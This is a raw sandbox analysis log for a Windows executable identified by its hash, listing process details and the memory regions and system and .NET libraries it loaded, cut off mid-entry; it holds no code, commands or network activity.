# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 25.04.2022 13:01:33.764 Process: id = "1" image_name = "458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" page_root = "0x6c102000" os_pid = "0xe44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x4a0" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 123 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 124 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 125 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 126 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 127 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 128 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x40bfff monitored = 1 entry_point = 0x40732e region_type = mapped_file name = "458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe") Region: id = 131 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 132 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 133 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 271 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 272 start_va = 0x7ff864bb0000 end_va = 0x7ff864c17fff monitored = 1 entry_point = 0x7ff864bb4970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 273 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 274 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 275 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 276 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 277 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 278 start_va = 0x650000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 279 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 280 start_va = 0x7ff87aa90000 end_va = 0x7ff87ab08fff monitored = 0 entry_point = 0x7ff87aaafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 281 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 282 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 283 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 284 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 285 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 286 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 287 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 288 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 289 start_va = 0x750000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 290 start_va = 0x190000 end_va = 0x196fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 291 start_va = 0x7ff864b10000 end_va = 0x7ff864ba7fff monitored = 1 entry_point = 0x7ff864b11000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 292 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 293 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 294 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 295 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 296 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 297 start_va = 0x1a0000 end_va = 0x1d8fff monitored = 0 entry_point = 0x1a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 298 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 299 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 300 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 301 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 302 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 303 start_va = 0xb70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 304 start_va = 0x1c0000 end_va = 0x1c5fff monitored = 1 entry_point = 0x1c732e region_type = mapped_file name = "458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\458ad7362cfb6980b9e7eb19ab83ddc6d261bf6b057f1892267dd55c656e9686.exe") Region: id = 305 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 306 start_va = 0x7ff870d80000 end_va = 0x7ff870d89fff monitored = 0 entry_point = 0x7ff870d81350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 307 start_va = 0x7ff85f860000 end_va = 0x7ff8601edfff monitored = 1 entry_point = 0x7ff85f98d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 308 start_va = 0x7ff8649b0000 end_va = 0x7ff864aa6fff monitored = 0 entry_point = 0x7ff8649d4d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 309 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 310 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 311 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 312 start_va = 0x7ff800100000 end_va = 0x7ff80010ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800100000" filename = "" Region: id = 313 start_va = 0x7ff800110000 end_va = 0x7ff80011ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800110000" filename = "" Region: id = 314 start_va = 0x7ff800120000 end_va = 0x7ff8001affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800120000" filename = "" Region: id = 315 start_va = 0x7ff8001b0000 end_va = 0x7ff80021ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff8001b0000" filename = "" Region: id = 316 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 317 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 318 start_va = 0x1f70000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 319 start_va = 0x1f70000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 320 start_va = 0x20d0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 321 start_va = 0x1f70000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 322 start_va = 0x2090000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 323 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 324 start_va = 0x20e0000 end_va = 0x1a0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 325 start_va = 0x1a0e0000 end_va = 0x1a44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a0e0000" filename = "" Region: id = 326 start_va = 0x1a450000 end_va = 0x1a556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a450000" filename = "" Region: id = 327 start_va = 0x1a560000 end_va = 0x1a65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a560000" filename = "" Region: id = 328 start_va = 0x1a660000 end_va = 0x1a996fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 329 start_va = 0x7ff85e390000 end_va = 0x7ff85f855fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Region: id = 330 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 331 start_va = 0x750000 end_va = 0x80ffff monitored = 0 entry_point = 0x770da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 332 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 333 start_va = 0x1a9a0000 end_va = 0x1aa7cfff monitored = 0 entry_point = 0x1a9fe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 334 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 335 start_va = 0x1a9a0000 end_va = 0x1ab3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9a0000" filename = "" Region: id = 336 start_va = 0x7ff5ffe30000 end_va = 0x7ff5ffecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5ffe30000" filename = "" Region: id = 337 start_va = 0x7ff5ffe20000 end_va = 0x7ff5ffe2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5ffe20000" filename = "" Region: id = 338 start_va = 0x7ff800220000 end_va = 0x7ff80025ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800220000" filename = "" Region: id = 339 start_va = 0x7ff800260000 end_va = 0x7ff80026ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800260000" filename = "" Region: id = 340 start_va = 0x7ff861570000 end_va = 0x7ff861674fff monitored = 1 entry_point = 0x7ff86157107c region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 341 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 342 start_va = 0x420000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 343 start_va = 0x7ff85d4a0000 end_va = 0x7ff85e0b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\cb0700ff6398b8e9d0d936cfc4894ba1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\cb0700ff6398b8e9d0d936cfc4894ba1\\system.ni.dll") Region: id = 344 start_va = 0x7ff85d2b0000 end_va = 0x7ff85d49afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\07904e28a4042013cf2850aa829d512c\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.drawing\\07904e28a4042013cf2850aa829d512c\\system.drawing.ni.dll") Region: id = 345 start_va = 0x7ff85c3c0000 end_va = 0x7ff85d2a2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Windows.Forms\\b3ed3a5b3196c07e3a9165328654c5de\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.windows.forms\\b3ed3a5b3196c07e3a9165328654c5de\\system.windows.forms.ni.dll") Region: id = 346 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 347 start_va = 0x430000 end_va = 0x431fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 348 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 349 start_va = 0x7ff85ba30000 end_va = 0x7ff85c3b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\5290f26e6772518e2dd9d9c55bcc9a10\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.core\\5290f26e6772518e2dd9d9c55bcc9a10\\system.core.ni.dll") Region: id = 350 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 351 start_va = 0x7ff800270000 end_va = 0x7ff80027ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff800270000" filename = "" Region: id = 352 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 353 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 354 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 355 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 356 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 357 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 358 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 359 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 360 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 361 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 362 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 363 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 364 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 365 start_va = 0x7ff87bf40000 end_va = 0x7ff87bf56fff monitored = 0 entry_point = 0x7ff87bf479d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 366 start_va = 0x7ff87bbd0000 end_va = 0x7ff87bc03fff monitored = 0 entry_point = 0x7ff87bbeae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 367 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 368 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 369 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 370 start_va = 0x750000 end_va = 0x7f5fff monitored = 0 entry_point = 0x7593e0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll") Region: id = 371 start_va = 0x7ff8749c0000 end_va = 0x7ff874a69fff monitored = 0 entry_point = 0x7ff8749c93e0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll") Region: id = 372 start_va = 0x1a9a0000 end_va = 0x1aacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a9a0000" filename = "" Region: id = 373 start_va = 0x1ab30000 end_va = 0x1ab3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab30000" filename = "" Region: id = 374 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 375 start_va = 0x750000 end_va = 0x80bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 376 start_va = 0x440000 end_va = 0x443fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 377 start_va = 0x450000 end_va = 0x456fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 378 start_va = 0x1ab40000 end_va = 0x1adaffff monitored = 0 entry_point = 0x1abb0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 379 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 380 start_va = 0x460000 end_va = 0x460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 381 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 382 start_va = 0x1ab40000 end_va = 0x1ac9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab40000" filename = "" Region: id = 383 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 384 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 385 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 386 start_va = 0x1a9a0000 end_va = 0x1aa01fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 387 start_va = 0x1aac0000 end_va = 0x1aacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aac0000" filename = "" Region: id = 388 start_va = 0x7ff870e10000 end_va = 0x7ff870fb8fff monitored = 0 entry_point = 0x7ff870e64060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 389 start_va = 0x1aca0000 end_va = 0x1ae9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 390 start_va = 0x1ab40000 end_va = 0x1ac3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ab40000" filename = "" Region: id = 391 start_va = 0x1ac90000 end_va = 0x1ac9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac90000" filename = "" Region: id = 392 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 